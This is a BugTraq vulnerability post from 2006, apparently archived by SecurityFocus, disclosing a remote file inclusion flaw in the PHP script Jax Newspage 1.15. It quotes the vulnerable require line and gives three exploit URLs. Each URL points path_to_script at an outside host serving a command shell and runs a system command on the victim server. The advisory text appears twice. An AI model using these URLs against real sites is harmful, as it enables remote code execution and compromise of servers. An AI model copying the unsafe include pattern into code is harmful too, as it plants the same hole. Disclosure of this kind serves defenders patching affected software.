BugTraq
Back to list
|
Post reply
Jax Newspage Remote File include
Oct 13 2006 01:00AM
dj_remix_20 hotmail com
# BiyoSecurity.Org & SecurityWall.Org
# Download : http://www.jtr.de/scripting/php/newspage/newspage%20v1.15.zip
# Script Name : jax newspage
# Version : 1.15
# Risk : high
# Regard : RMx
# Thanx : Liz0zim , KorsaN , DreamLord , TR_IP
# Vulnerable Files :
/admin/index.php
/admin/news.admin.php
/newsarchive.php
# Vulnerable code :
// Global variables
require ( $path_to_script."globals.inc.php");
# Exploit :
http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.
com/cmd.gif?&cmd=ls
http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.
com/cmd.gif?&cmd=ls
http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://
site.com/cmd.gif?&cmd=ls
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
# Download : http://www.jtr.de/scripting/php/newspage/newspage%20v1.15.zip
# Script Name : jax newspage
# Version : 1.15
# Risk : high
# Regard : RMx
# Thanx : Liz0zim , KorsaN , DreamLord , TR_IP
# Vulnerable Files :
/admin/index.php
/admin/news.admin.php
/newsarchive.php
# Vulnerable code :
// Global variables
require ( $path_to_script."globals.inc.php");
# Exploit :
http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.
com/cmd.gif?&cmd=ls
http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.
com/cmd.gif?&cmd=ls
http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://
site.com/cmd.gif?&cmd=ls
[ reply ]